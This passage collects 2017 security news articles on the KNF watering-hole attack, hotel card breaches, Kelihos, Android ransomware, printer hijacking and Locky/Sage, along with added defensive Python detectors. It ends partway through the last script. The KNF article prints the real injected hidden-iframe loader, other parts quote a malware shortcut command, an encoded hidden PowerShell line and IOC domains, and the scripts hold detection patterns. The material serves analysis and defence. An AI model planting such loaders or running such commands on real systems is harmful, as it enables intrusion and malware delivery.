The modified JS file caused visitors to the KNF website to load an external script, which then downloaded the malware from an external server and installed it.

The unauthorized code was stored in the following file:

http://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11

and looked like this:

document.write("<div id='efHpTk' width='0px' height='0px'><iframe name='forma' src='https://sap.misapor.ch/vishop/view.jsp?pagenum=1' width='145px' height='146px' style='left:-2144px;position:absolute;top:0px;'></iframe></div>");

At the time of writing, both the KNF and the Polish government confirmed that there is no indication that the crooks have stolen money from the banks.

“Significantly, we do not so far have any information, related to these attacks, of a successful or unsuccessful attempt to steal funds from bank accounts. This may indicate that the goal of the attackers was information, not money,” reported the local media outlet zaufanatrzeciastrona.pl. “In at least one case, it is known that a large amount of data has been transferred from the bank’s network to external servers, but because the data were encrypted by the criminals prior to transfer, determining what was stolen can be difficult.”

The only certainty is that the incident could be considered the largest system hack ever in the country’s financial sector.

The IOCs are available on the badcyber.com website.


Polish Banks Hacked using Malware Planted on their own Government Site
7.2.2017 thehackernews Crime

In what is considered to be the largest system hack in the country's history and a massive attack on the financial sector, several banks in Poland have been infected with malware.
What's surprising? The source of the malware infection is their own financial regulator, the Polish Financial Supervision Authority (KNF) -- which, ironically, is meant to keep an eye out for the safety and security of financial systems in Poland.
During the past week, the security teams at several unnamed Polish banks discovered malicious executables on the workstations of several banks.
The KNF confirmed that its internal systems had been compromised by someone "from another country," although no further details were provided.
After downloads of suspicious files that were infecting various banking systems had been discovered on the regulator's servers, the KNF decided to take down its entire system "in order to secure evidence."
Here's what happened:

An unknown attacker compromised the KNF's website for well over a week by modifying one of the site's JavaScript files, making visitors to the regulator's site load the malicious JavaScript file, which then downloaded the malicious payloads.
Once downloaded and executed, the malware connected to some foreign servers to perform various malicious tasks such as reconnaissance, data exfiltration, and post exploitation.
This particular malware appears to be a new strain that had never been seen before in live attacks and had a zero detection rate on VirusTotal.
In some cases, the attackers even managed to gain control over critical servers within the targeted bank's infrastructures.
Security blogger BadCyber spoke to several banks, and some 20 commercial banks across Poland have already confirmed being victims of a malware infection while other banks keep looking.
The affected banks discovered the encrypted executable files on several servers and unusual network traffic going to uncommon IP addresses located in foreign countries.
Both the KNF and the Polish government confirmed to local Polish media that the investigation is ongoing, that there is no indication of people's money being affected in the attack, and that no operations were affected.
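Both write-ups come down to one modified JavaScript file on the regulator's site that wrote a hidden, off-screen iframe. The following is an added example, not code from either article or from the investigators, showing two checks a site operator can run: an integrity diff against the deployed baseline and a scan for document.write()-injected hidden iframes; the sample scripts and the `malicious.example` host are constructed.

```python
"""Checks for an injected, hidden iframe loader of the kind found in the
modified KNF script: a document.write() that emits a zero-size <div>
wrapping an <iframe> whose style pushes it off-screen.

Added example for this article, not code from the investigation; the
sample scripts are constructed and use a placeholder host.
"""
import hashlib
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set
from urllib.parse import urlparse

DOCUMENT_WRITE_RE = re.compile(r"document\.write\s*\(\s*(['\"])(.*?)\1\s*\)", re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
STYLE_RE = re.compile(r"style\s*=\s*['\"]([^'\"]*)['\"]", re.I)
SRC_RE = re.compile(r"src\s*=\s*['\"]([^'\"]*)['\"]", re.I)
ZERO_DIV_RE = re.compile(r"<div\b[^>]*\b(?:width|height)\s*=\s*['\"]0px['\"]", re.I)


@dataclass
class Finding:
    src: str
    reasons: List[str]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def is_offscreen(style: str) -> bool:
    """True for absolute positioning with a negative left or top offset."""
    decls: Dict[str, str] = {}
    for decl in style.split(";"):
        if ":" in decl:
            key, val = decl.split(":", 1)
            decls[key.strip().lower()] = val.strip().lower()
    if decls.get("position") != "absolute":
        return False
    for prop in ("left", "top"):
        match = re.match(r"(-?\d+)px", decls.get(prop, ""))
        if match and int(match.group(1)) < 0:
            return True
    return False


def hidden_iframe_findings(js_source: str, own_hosts: Optional[Set[str]] = None) -> List[Finding]:
    """Report every iframe written by document.write() that is hidden from
    the visitor or that points at a host the site does not own."""
    own_hosts = own_hosts or set()
    findings: List[Finding] = []
    for write in DOCUMENT_WRITE_RE.finditer(js_source):
        html = write.group(2)
        for frame in IFRAME_RE.finditer(html):
            attrs = frame.group(1)
            reasons: List[str] = []
            style = STYLE_RE.search(attrs)
            if style and is_offscreen(style.group(1)):
                reasons.append("off-screen absolute positioning")
            if ZERO_DIV_RE.search(html):
                reasons.append("zero-size container div")
            src_match = SRC_RE.search(attrs)
            src = src_match.group(1) if src_match else ""
            host = urlparse(src).hostname
            if host and own_hosts and host not in own_hosts:
                reasons.append(f"external src host {host}")
            if reasons:
                findings.append(Finding(src, reasons))
    return findings


def drifted_files(baseline: Dict[str, str], current: Dict[str, bytes]) -> List[str]:
    """Integrity check: paths whose SHA-256 no longer matches the deployed
    baseline (a modified accordian-src.js would show up here first)."""
    return sorted(path for path, data in current.items()
                  if sha256_hex(data) != baseline.get(path))


# Constructed stand-in for a harmless site script.
CLEAN_JS = """
function toggleAccordion(id) {
  var el = document.getElementById(id);
  el.style.display = (el.style.display === 'none') ? 'block' : 'none';
}
"""
# The same script with an injected loader modelled on the one quoted in the
# article; 'malicious.example' is a placeholder, not the real host.
INJECTED_JS = CLEAN_JS + (
    "document.write(\"<div id='efHpTk' width='0px' height='0px'>"
    "<iframe name='forma' src='https://malicious.example/vishop/view.jsp?pagenum=1' "
    "width='145px' height='146px' style='left:-2144px;position:absolute;top:0px;'>"
    "</iframe></div>\");\n"
)

if __name__ == "__main__":
    baseline = {"resources/accordian-src.js": sha256_hex(CLEAN_JS.encode())}
    print("drifted:", drifted_files(baseline, {"resources/accordian-src.js": INJECTED_JS.encode()}))
    for finding in hidden_iframe_findings(INJECTED_JS, own_hosts={"www.knf.gov.pl"}):
        print(finding.src, "->", ", ".join(finding.reasons))
```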


US Judge Ordered Google to Hand Over Emails Stored On Foreign Servers to FBI
7.2.2017 thehackernews Security

In a world of global mass surveillance, not only by the US but also by intelligence agencies across the globe, every country wants tech companies including Google, Apple, and Microsoft to set up and maintain servers within its borders so that its citizens' data stays at home.
Last year, Microsoft won a case which ruled that the US government cannot force tech companies to hand over their non-US customers' data stored on servers located in other countries to the FBI or any other federal authorities.
However, a new notable ruling just goes against the court judgment last year, raising concerns regarding people's privacy.
A US magistrate reportedly ruled Friday that Google has to comply with FBI search warrants seeking customer emails stored on servers outside of the United States, according to Reuters.
U.S. Magistrate Judge Thomas Rueter in Philadelphia noted that transferring emails from outside servers so the FBI could read them locally as part of a domestic fraud probe didn't qualify as a seizure because there's "no meaningful interference" with the account holder's "possessory interest" in the data sought.
Here's what Judge Rueter says:
"Google regularly transfers user data from one data center to another without the customer's knowledge. Such transfers do not interfere with the customer’s access or possessory interest in the user data. Even if the transfer interferes with the account owner's control over his information, this interference is de minimis [minimal] and temporary."
In August 2016, the search engine giant was ordered to comply with two FBI search warrants related to criminal investigations, but Google provided only the data stored on its US servers.
So, the government filed a motion to compel Google to hand over the rest of the information to the FBI.
When the company referred to the last year's ruling in favor of Microsoft by the US Court of Appeals for the Second Circuit in a similar case, the judge said Google was found processing its foreign-stored data in a way that made it impossible for the US government to ask a foreign state for legal assistance.
However, Google made it clear that a search warrant, if granted, can give the government access to email content, while subpoenas and court orders only let them access non-content data, like an account creation number, phone number, and sign-in IP address.
According to the new ruling, the search engine giant receives over 25,000 requests every year from United States authorities for disclosures of user data in criminal matters.
Google is obviously unhappy with the result and intends to fight it.


Carbon Black Unveils "Streaming Prevention" to Thwart Attacks in Progress

7.2.2017 securityweek Virus
New Streaming Prevention Technology Collects, Correlates and Analyzes Endpoint Events in Real-time to Detect and Stop Attacks In Progress

Malicious attacks are increasingly leveraging non-malware methodologies. Already, 53% of attacks do not use malware; and it is estimated that over the next 90 days, one-third of organizations will face a non-malware attack. It is claimed that these attacks will likely succeed because current AV technology, whether first-gen or second-gen machine learning technology, is focused almost entirely on detecting a malicious file dropped on the endpoint.

To combat this new attack vector, Carbon Black has today announced its new Streaming Prevention technology. Carbon Black CTO Mike Viscuso talked to SecurityWeek to explain why this new approach is necessary, and how it works.

Viscuso described standard AV as 'point-in-time' prevention, and illustrated it with an example from the NSA. Since the NSA is offensive as well as defensive, it checks its own tools against standard defenses. When a new McAfee product was launched, it was tested against NSA tools -- and it succeeded in blocking one of them. This tool spun up a command shell that could be used remotely. To get by it, the NSA operatives simply renamed the command shell to something else; and it worked.

The point, explained Viscuso, is that most anti-malware products look for 'points', usually files. They do not look for behavior in context. If the attacker does not drop a file that can be analyzed, or if it involves something not recognized by the defense, it is simply allowed. "Many of the big breaches in recent years, Yahoo, Oracle and DNC, for example, all resulted from a non-malware attack."

This new attack approach leverages the existing power of the operating system. It uses trusted OS tools such as PowerShell and WMI to do the work. He gave an example: "A compromised website could require Flash. Flash could be exploited to run PowerShell. PowerShell would conduct the attack." There is, he says, nothing in this process for contemporary anti-malware products to detect and prevent.

"Anti-malware products," he explained, "are very focused on malicious software; that is, malware. When a new file gets put onto your system, anti-malware will scan it to determine whether it thinks it is malicious or not. It is very point-in-time. But the reality is that attackers are increasingly not using malware. They've got much more sophisticated -- but so has technology. We're leveraging new technology that has been very successful in other industries -- called event stream processing -- to look at the full history of what this system or process or set of processes has been doing."

Carbon Black's Streaming Prevention has grown out of the event stream processing developed for algorithmic trading. A simple algorithm could tell a trader to buy a particular stock at one price and to sell at another price. But if the entire market is moving, those point-in-time instructions could be bad advice. What is necessary for the algorithm is a deeper understanding of the entire market.

"It needs more data," said Viscuso. "So, a technology called event stream processing was developed which allowed the consumption of millions and millions of data points, and had the ability to analyze them very rapidly in order to make the right decision; and to further allow the algorithm to update itself, in milliseconds, over and over again in a loop, so that it can make better and better decisions over time."

This, he said, is the basis of Streaming Prevention. It applies machine learning and network anomaly techniques to the endpoint. It examines and tags TTPs (tactics, techniques and procedures) used in malicious activities, and analyzes them in context. "It is continuously learning from what it sees, and has seen in the past, when a certain sequence of events could lead to a breach. It can then apply a risk decision on that sequence of events to determine whether it is an attack or not. Over time, this risk decision gets more and more accurate and perceptive; and over time it will learn how to prevent all non-malware attacks."

Streaming Prevention is a cloud service. The analysis is conducted in the cloud and the result of the analyses pushed down to the endpoint so the endpoint acts independently. But data is gathered from all client endpoints and streamed up to the cloud. "The results are then shared with all customers so they are protected against local attacks and also new attacks happening elsewhere." Endpoints, he added, can now be protected against both malware and non-malware attacks.
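As an added illustration of the event stream idea, not Carbon Black's code, the following scores each new process against its full lineage, so the browser -> Flash -> PowerShell chain and a renamed command shell are caught from behaviour rather than from a dropped file; the event schema, the sample stream and the `original_name` field (assumed to be the binary's OriginalFilename as an endpoint sensor would record it) are constructed.

```python
"""Event-stream detection of a non-malware chain (browser -> plugin ->
PowerShell) from process lineage and behaviour, not from a file on disk.

Added example, not Carbon Black's code. The event schema and sample stream
are constructed; 'original_name' is assumed to be the OriginalFilename
from the binary's version resource, so renaming cmd.exe does not change it.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    path: str              # on-disk image path, chosen by whoever wrote the file
    original_name: str     # identity of the binary itself (assumed sensor field)
    cmdline: str
    outbound: bool = False  # process has opened an outbound network connection


# Behavioural role comes from the binary's identity, not its on-disk name.
ROLE_BY_ORIGINAL_NAME = {
    "chrome.exe": "browser", "iexplore.exe": "browser", "firefox.exe": "browser",
    "flashplayerplugin.exe": "plugin",
    "powershell.exe": "script_host", "wscript.exe": "script_host", "cscript.exe": "script_host",
    "cmd.exe": "shell",
}

# Lineage runs (oldest first) that a point-in-time file scan never sees:
# nothing is dropped and every process is a trusted OS binary.
CHAIN_RULES: List[Tuple[Tuple[str, ...], int, str]] = [
    (("browser", "plugin", "script_host"), 60, "browser plugin launched a script host"),
    (("browser", "script_host"), 50, "browser launched a script host"),
    (("script_host", "shell"), 20, "script host spawned a command shell"),
]
CMDLINE_INDICATORS = (("-enc", 15), ("-nop", 5), ("-w hidden", 10),
                      ("downloadstring", 20), ("frombase64string", 15))


@dataclass
class Alert:
    pid: int
    score: int
    reasons: List[str]


def contains_run(pattern: Tuple[str, ...], chain: List[str]) -> bool:
    """True when pattern occurs as a contiguous run inside chain."""
    n = len(pattern)
    return any(tuple(chain[i:i + n]) == pattern for i in range(len(chain) - n + 1))


class StreamingDetector:
    """Consumes process events one at a time; each new process is scored
    against the whole lineage accumulated so far, not in isolation."""

    def __init__(self, threshold: int = 60, max_depth: int = 8):
        self.procs: Dict[int, ProcEvent] = {}
        self.threshold = threshold
        self.max_depth = max_depth

    def role(self, ev: ProcEvent) -> str:
        return ROLE_BY_ORIGINAL_NAME.get(ev.original_name.lower(), "other")

    def lineage(self, ev: ProcEvent) -> List[str]:
        """Roles from the oldest known ancestor down to ev itself."""
        roles, cur, depth = [self.role(ev)], ev, 0
        while cur.ppid in self.procs and depth < self.max_depth:
            cur = self.procs[cur.ppid]
            roles.append(self.role(cur))
            depth += 1
        return roles[::-1]

    def ingest(self, ev: ProcEvent) -> Optional[Alert]:
        self.procs[ev.pid] = ev
        score, reasons = 0, []
        chain = self.lineage(ev)
        for pattern, points, why in CHAIN_RULES:
            if contains_run(pattern, chain):
                score, reasons = score + points, reasons + [why]
        low = ev.cmdline.lower()
        for token, points in CMDLINE_INDICATORS:
            if token in low:
                score, reasons = score + points, reasons + [f"command line contains {token!r}"]
        disk_name = ev.path.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if disk_name != ev.original_name.lower():
            score, reasons = score + 25, reasons + [f"{disk_name} is really {ev.original_name}"]
        if ev.outbound and self.role(ev) in ("script_host", "shell"):
            score, reasons = score + 20, reasons + ["script host/shell opened an outbound connection"]
        return Alert(ev.pid, score, reasons) if score >= self.threshold else None


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_STREAM = [  # constructed endpoint events, in arrival order
    ProcEvent(100, 1, "C:\\Windows\\explorer.exe", "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "C:\\Program Files\\Internet Explorer\\iexplore.exe", "iexplore.exe",
              "iexplore.exe https://compromised.example/", outbound=True),
    ProcEvent(300, 200, "C:\\Windows\\System32\\Macromed\\Flash\\FlashPlayerPlugin.exe",
              "FlashPlayerPlugin.exe", "FlashPlayerPlugin.exe"),
    ProcEvent(400, 300, PS, "powershell.exe", PS + " -nop -w hidden -enc SQBFAFgA", outbound=True),
    # cmd.exe copied under a new name: the path lies, the binary's identity does not
    ProcEvent(500, 400, "C:\\Users\\bob\\AppData\\Local\\Temp\\updater.exe", "cmd.exe",
              "updater.exe /c whoami"),
    # the same PowerShell binary started from the desktop for a backup job: no chain, no alert
    ProcEvent(600, 100, PS, "powershell.exe", PS + " -File C:\\scripts\\backup.ps1"),
]


def run_stream(events: List[ProcEvent]) -> List[Optional[Alert]]:
    detector = StreamingDetector()
    return [detector.ingest(ev) for ev in events]


if __name__ == "__main__":
    for ev, alert in zip(SAMPLE_STREAM, run_stream(SAMPLE_STREAM)):
        print(ev.pid, "ALERT" if alert else "ok", alert.score if alert else "", alert.reasons if alert else "")
```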

In October 2016, Carbon Black announced a partnership with IBM Security that will allow Carbon Black endpoint threat data to feed into IBM's BigFix for instant attack remediation.

As a company, Carbon Black has more than 600 employees and is a result of Bit9 merging with Carbon Black in February 2014. In October 2016, The Wall Street Journal reported that Carbon Black has made a confidential IPO filing under the JOBS Act.


InterContinental Confirms Card Breach at 12 Hotels

7.2.2017 securityweek Crime
British multinational hotel company InterContinental Hotels Group (IHG) confirmed on Friday that systems processing payments for some of its properties in the Americas region have been breached by cybercriminals.

The company launched an investigation in late December, following reports of a fraud pattern on credit and debit cards used at some of its hotels, particularly ones operating under the Holiday Inn and Holiday Inn Express brands.

Cyber security firms investigating the incident found malware on servers that processed payment cards at the bars and restaurants of 12 properties managed by IHG. Cards used at front desks are not affected.

The malware infected servers between August and December 2016, and it was designed to steal track data (i.e. cardholder name, card number, expiration date and verification code) as it passed through the compromised system. The company has not provided any information about the number of affected cards.

The list of impacted hotels includes Crowne Plaza San Jose-Silicon Valley, Holiday Inn San Francisco Fisherman’s Wharf, InterContinental Los Angeles Century City, InterContinental Mark Hopkins in San Francisco, InterContinental San Francisco, InterContinental Buckhead Atlanta, InterContinental Chicago Magnificent Mile, InterContinental The Willard in Washington D.C., Holiday Inn Nashville Airport, Holiday Inn Resort in Aruba, InterContinental Toronto Yorkville in Canada, and InterContinental San Juan Resort & Casino in Puerto Rico.

“We have been working with the security firms to review our security measures, confirm that this issue has been remediated, and evaluate ways to enhance our security measures,” IHG told customers. “We have also notified law enforcement and are working with the payment card networks so that the banks that issue payment cards can be made aware and initiate heightened monitoring on the affected cards.”

IHG hotels were affected by at least two other data breaches last year. Kimpton Hotels & Restaurants informed customers in August that hackers had access to its payment systems between February and July, and InterContinental hotels were also involved in an incident that impacted HEI Hotels & Resorts.

The list of other hotel chains that suffered a data breach recently also includes Noodles & Company, Hard Rock Hotel & Casino Las Vegas, Trump Hotels, Millennium Hotels & Resorts and Omni Hotels.


Kelihos Spreads via USB Drives

7.2.2017 securityweek Virus
Kelihos, the malware behind one of the longest standing botnets out there, was recently observed spreading via infected thumb drives, researchers have discovered.

The Kelihos botnet has been around for many years, and even survived takedown attempts over half a decade ago. Last year, the botnet’s activity ramped up as tens of thousands of new bots were added to it. Kelihos was being used for the distribution of MarsJoke, Wildfire, and Troldesh ransomware and various Trojans, including Panda Zeus, Nymaim and Kronos.

The botnet is being rented as part of the “spam as a service” business model and continues to geo-target users. The latest campaign targeted users in Canada with links to Tangerine Bank phishing pages, while distributing a link to the Ecstasy website to recipients with “.kz” email addresses, Arsh Arora, malware analyst and Ph.D. researcher at The University of Alabama at Birmingham, discovered.

The emails, sent with the subject line “TANGERINE online account has been suspended” (Tangerine being the internet and telephone bank formerly known as ING Direct), contain a webpage that attempts to trick the user into clicking a button. An HTML version of the page is displayed to potential victims, encouraging them to click a “Learn More” button that takes them to a phishing site, which attempts to steal their credentials by asking them to verify their information.

The geo-tagging of addresses ending with “.kz” is something new for the Kelihos botnet, the security researcher notes. The spam message, which featured a subject line in Russian, was directing users to an adult site (www[dot]almatinki[dot]com).

The most interesting part of the attack, however, is the fact that the removable drives attached to the compromised machines would be infected with a copy of the original Kelihos binary. The security researcher says that the malware was written to a thumb drive connected to the virtual machine that was infected as part of the new campaign.

Saved on the thumb drive under the name “porn.exe,” the executable is hidden from the user, as are a few shortcuts that were not present on the removable device before. The file, the security researcher says, is the Kelihos botnet malware.

The researcher also discovered that the CreateFile function was linked to the dropped executable. The malware attempts to open several files with CreateFile and, if that fails, falls back to creating the .exe file, to which it then writes the malicious binary. Next, the malware creates shortcuts for the hidden directories and executables.

“An Autorun.inf is not created to run this file, however, a shortcut to the file with the command C:\WINDOWS\system32\cmd.exe F/c ‘start %cd%\porn.exe’ can be found on the drive, as well as shortcut to several other hidden directories on the drive (not malicious),” the security researcher says.

When the executable runs, it behaves just like a normal Kelihos would, though the researcher says that they weren’t yet able to infect a new drive with the botnet, meaning that further investigation is required to reveal the specific mechanism the malware uses for infection, especially with the executable seemingly identical to the original binary.


Android Ransomware Uses Dropper to Increase Effectiveness

7.2.2017 securityweek Virus
The use of droppers to infect devices with ransomware has spread to Android, Symantec security researchers warn.

The use of a dropper to deliver malware on Android is a new technique, although it is a very popular one when it comes to malware for desktop computers. Furthermore, researchers say, the actors using it have also implemented a 2D barcode technique meant to help them receive payment from victims, but they did this ineffectively.

Spotted about a year ago, the Lockdroid ransomware was designed to encrypt user files and perform other nefarious activities as well. It requests device admin rights and, if the user grants them, it can also lock devices, prevent the user from uninstalling it using the user interface (UI) or the command line interface, and can even force factory resets, thus erasing all user data from the device.

The malware designed to drop the Android.Lockdroid.E ransomware is being distributed via third-party apps, but also through text messages and forum posts. The dropper installs a copy of itself only on rooted devices; devices that haven’t been rooted it simply locks, Symantec discovered.

Once installed on a device, the malicious app checks to see whether the device has been rooted and requests root access permissions if it has. The malware claims that this would allow it to access thousands of adult movies for free, in an effort to convince potential victims of the necessity of these permissions.

Once the user agrees, the malware drops a copy of itself onto the device, by remounting the /system partition, copying the embedded APK file for Android.Lockdroid.E to /system/app/[THREAT NAME].apk, changing the dropped APK file's permission to executable, and rebooting the device so the threat can run on boot completed as a system application.

After the reboot, the threat is difficult to uninstall from the infected devices, because it has become a system application. After the installation process has been completed, Android.Lockdroid.E locks the device and displays the ransom screen and 2D barcode.

On unrooted devices, the ransomware immediately locks the device and displays the ransom screen and barcode. In such cases, however, the malware does not drop anything onto the compromised device. According to Symantec, the ransom demanded by this Trojan is rather difficult to pay.

“The instructions ask the user to scan the barcode to log in to a messaging app to pay the ransom. While this may seem like a good idea to have victims pay the ransom for their device, it is ineffective in practice. There is no way to scan the barcode or log in to the messaging app from the compromised device, so the barcode must be scanned from a second device. This makes it more difficult for the victim to pay their ransom and for the attacker to receive payment,” the security researchers say.


A Hacker hijacked over 150,000 Printers publicly exposed online
7.2.2017 securityaffairs Hacking

A hacker hijacked over 150,000 Printers publicly exposed online to warn owners of cyber attacks.
Recently a group of researchers from the University Alliance Ruhr found a cross-site printing bug in the old PostScript language. Popular printer models manufactured by Dell, Brother, Konica, Samsung, HP, and Lexmark are affected by security vulnerabilities that could be exploited by hackers to steal passwords, steal information from print jobs, and shut down the devices.

Following the above research, a hacker with the online moniker Stackoverflowin decided to hijack thousands of publicly exposed printers and print rogue messages, including ASCII art depicting robots, warning that the printers had been hacked and were part of a botnet.


The hacker said he wants to raise awareness about the risks of cyber attacks on printers exposed to the internet.

“A grey-hat hacker going by the name of Stackoverflowin says he’s pwned over 150,000 printers that have been left accessible online.” reads a blog post published by Bleeping Computer.

“Speaking to Bleeping Computer, the hacker says he wanted to raise everyone’s awareness towards the dangers of leaving printers exposed online without a firewall or other security settings enabled.”

Stackoverflowin claims to be a British high-school student with a passion for security research. He explained that he simply sent print jobs using the Line Printer Daemon (LPD) protocol, the Internet Printing Protocol (IPP) and the RAW protocol on port 9100 to printer models that were exposed on the internet without any authentication.

Stackoverflowin did much more, he also exploited an undisclosed remote command execution (RCE) vulnerability in the web management interface of Xerox devices.

The young hacker estimated that he compromised up to 150,000 printers, but he also claimed to have access to more RCE vulnerabilities that would have allowed him to reach more than 300,000 printers.

Stackoverflowin wrote an automated script which scans the Internet for open printer ports and sends a rogue print job to the device.


Remigio Isla (@lttle_wolf) tweeted on 4 Feb 2017: “@lmaostack LMAO! <3 can u send someone of Tweety? on my country we love tweety LOL 😂”

Below is the latest version of the message sent to the printers:

stackoverflowin the hacker god has returned, your printer is part of a flaming botnet, operating on putin's forehead utilising BTI's (break the internet) complex infrastructure.
[ASCII ART HERE]
For the love of God, please close this port, skid.
-------
Questions?
Twitter: https://twitter.com/lmaostack
-------
Many users on Twitter shared images of the rogue messages sent on Friday to their printers.

The case demonstrates the importance of adopting measures to protect devices exposed online, for example enforcing access rules on routers, setting up a VPN, or allowing access only from specific IP addresses.


Danger no longer scares: the dangerous virus is in retreat

6.2.2017 Novinky/Bezpečnost Viruses
The Danger malicious code was the most widespread threat circulating on the internet for several months last year. It is now in retreat, however: its share dropped significantly in January. This follows from statistics published by the antivirus company Eset.
It should be noted at the outset that Danger was still the most widespread threat of all in January. Its share, however, dropped dramatically month on month by more than 30 percentage points, to 11.05 %. That is exactly what shows this uninvited guest is in retreat.

The virus, whose full name is JS/Danger.ScriptAttachment, is very dangerous. It opens a backdoor into the operating system. Attackers can then use it to smuggle further malicious code into the infected computer; most often they spread extortion viruses of the ransomware family this way.

They encrypt stored data
These malicious codes begin encrypting the contents of the computer and show the user a notice that they must pay to have the computer decrypted, otherwise they will supposedly never get their data back.

Even after paying the ransom, users have no guarantee that they will actually get their data back. The virus must be uninstalled from the computer and the data then decrypted with a special program. In some cases, however, this is not possible.

“The drop in the share of the Danger downloader is really significant. In December it accounted for almost every second recorded threat, in January for only every tenth. However, we found a significant increase in the occurrence of various types of malware from the TrojanDownloader family,” said Miroslav Dvořák, technical director at Eset.

It downloads further malicious code
This malware can also cause a great deal of mischief on a computer. “As in the case of Danger, and as the name itself suggests, this is code that tries to load further malicious code onto the infected device,” Dvořák noted.

TrojanDownloader, specifically its Agent.CHO variant, was the second most widespread threat, with a share of 5.03 %. The top five are rounded out by the malicious codes ProxyChanger and Nemucod.

An overview of the ten most widespread threats for January can be found in the table below:

Top 10 threats in the Czech Republic for January 2017
1. JS/Danger.ScriptAttachment (11.05 %)
2. VBA/TrojanDownloader.Agent.CHO (5.03 %)
3. JS/ProxyChanger (4.36 %)
4. JS/TrojanDownloader.Nemucod (4.12 %)
5. JS/Kryptik.RE (3.38 %)
6. VBA/TrojanDownloader.Agent.CIY (2.55 %)
7. VBA/TrojanDownloader.Agent.CIQ (2.04 %)
8. Java/Adwind (2.01 %)
9. JS/TrojanDownloader.Iframe (1.73 %)
10. PowerShell/TrojanDownloader.Agent.DV (1.58 %)
Source: Eset


Locky, Sage Ransomware Share Distribution Infrastructure

6.2.2017 securityweek Virus

Locky ransomware was recently observed being distributed using the same delivery infrastructure previously used to spread the Sage ransomware, PhishMe security researchers warn.

It’s not uncommon for cybercriminals to share infrastructure, so the reuse of the same resources to drop both Sage and Locky isn’t surprising. However, the discovery does show that Locky’s operators are working on securing new distribution venues, after the Necurs botnet, the main Locky distributor, went silent recently.

The Sage ransomware emerged on the threat landscape at the end of 2016 and was detailed early this year. The first delivery emails employed explicit or racy narratives to trick users into opening malicious attachments, but the actors then moved to business-related themes and started using random numbers in email subjects to elude some basic spam filters.

Some of the distribution emails didn’t have a subject line at all, but featured the recipient’s name as part of the attachment's file name, which was usually a double-zipped archive containing a malicious Office document or .js file. Other emails claimed to contain information about a financial transaction that had been rejected, or about a refund deposit that had failed after an order had been canceled.

According to PhishMe, the campaign they analyzed leveraged a .zip file (named “document_1.zip”) with a JavaScript application inside, meant to download the Sage ransomware in the form of a Windows executable. The payload was retrieved from the domain affections[.]top, and the malware leveraged the same payment gateway’s Tor site as before, as well as the Tor2Web gateway addresses on er29sl[.]com and rzunt3u2[.]com.

Starting on January 26, 2017, however, a phishing campaign used to deliver the Locky ransomware was observed using the very same email narratives and metadata. Furthermore, the domain affections[.]top was being used as part of the delivery process for this ransomware family on Monday, January 30.

“This connection pushes the narrative forward in yet another way as the Locky distribution in question was yet another example of that ransomware being paired with the Kovter Trojan,” PhishMe notes. The relation between Locky and Kovter has been detailed a few times lately, most recently by Microsoft, which stumbled upon a two-step delivery technique which attempted to drop Locky first, but switched to Kovter if that failed.

The overlapping infrastructure also demonstrates once again how frequently cybercriminals reuse malware support and distribution infrastructure. The distribution of both Sage and Locky from the same location can be seen as evidence of the commodity status of ransomware tools like these. Both families are equally effective when delivered through these narratives and this infrastructure, but the overlap also gives researchers and security professionals a few avenues for mitigating them.

“First, the shared infrastructure provides a high-fidelity indicator of compromise that can be preemptively blocked to foil the delivery of multiple ransomware varieties. Secondly, since the qualitative tactics, techniques, and procedures used in the distribution of these ransomware varieties are nearly identical and closely resemble classic phishing narratives easily recognizable to users prepared and empowered to identify and report phishing emails,” PhishMe notes.
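The first mitigation PhishMe describes, blocking the shared infrastructure as a high-fidelity indicator, comes down to matching the defanged domains from the write-up against outbound request logs. The following is an added example (not PhishMe's or SecurityWeek's code) that refangs the three domains named above, matches them as exact hosts or parent domains against a proxy log, and lists the clients that touched them. The log layout and every log line are constructed for this example.

```python
"""Block-list check for the shared Sage/Locky delivery infrastructure.

Added example, not PhishMe's or SecurityWeek's code. The three domains are the
defanged indicators named in the article; the proxy-log layout
"<timestamp> <client_ip> <method> <url> <status>" and the log lines themselves
are constructed for this example.
"""
import re
from typing import Iterable, List, Tuple

# Defanged indicators exactly as the write-up presents them.
DEFANGED_IOCS = ["affections[.]top", "er29sl[.]com", "rzunt3u2[.]com"]

# Constructed sample proxy log (one request per line).
SAMPLE_LOG = """\
2017-01-30T09:12:01Z 10.0.0.15 GET http://affections.top/document_1.zip 200
2017-01-30T09:12:03Z 10.0.0.15 GET http://www.example.com/ 200
2017-01-30T09:14:20Z 10.0.0.22 GET http://er29sl.com/ 200
2017-01-30T09:15:44Z 10.0.0.31 GET https://notaffections.top/index.html 200
2017-01-30T09:16:10Z 10.0.0.22 GET http://cdn.rzunt3u2.com/pay 200
"""

_URL_HOST = re.compile(r"^(?:[a-z]+://)?([^/:?#\s]+)", re.IGNORECASE)


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 'affections[.]top' into a plain hostname."""
    return indicator.replace("[.]", ".").lower().strip(".")


def extract_host(url: str) -> str:
    """Pull the hostname out of a URL (scheme optional, port/path stripped)."""
    m = _URL_HOST.match(url)
    return m.group(1).lower().rstrip(".") if m else ""


def host_matches(host: str, blocked: Iterable[str]) -> bool:
    """True if host is a blocked domain or a subdomain of one.

    The leading-dot check keeps 'notaffections.top' from matching
    'affections.top'; a plain endswith() would produce that false positive.
    """
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in blocked)


def find_hits(log_text: str, iocs: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (timestamp, client_ip, host) for each request to blocked infrastructure."""
    blocked = [refang(i) for i in iocs]
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        ts, client, _method, url = fields[:4]
        host = extract_host(url)
        if host and host_matches(host, blocked):
            hits.append((ts, client, host))
    return hits


def affected_clients(log_text: str, iocs: Iterable[str]) -> List[str]:
    """Distinct client IPs that touched the infrastructure, in first-seen order."""
    seen: List[str] = []
    for _ts, client, _host in find_hits(log_text, iocs):
        if client not in seen:
            seen.append(client)
    return seen


if __name__ == "__main__":
    for ts, client, host in find_hits(SAMPLE_LOG, DEFANGED_IOCS):
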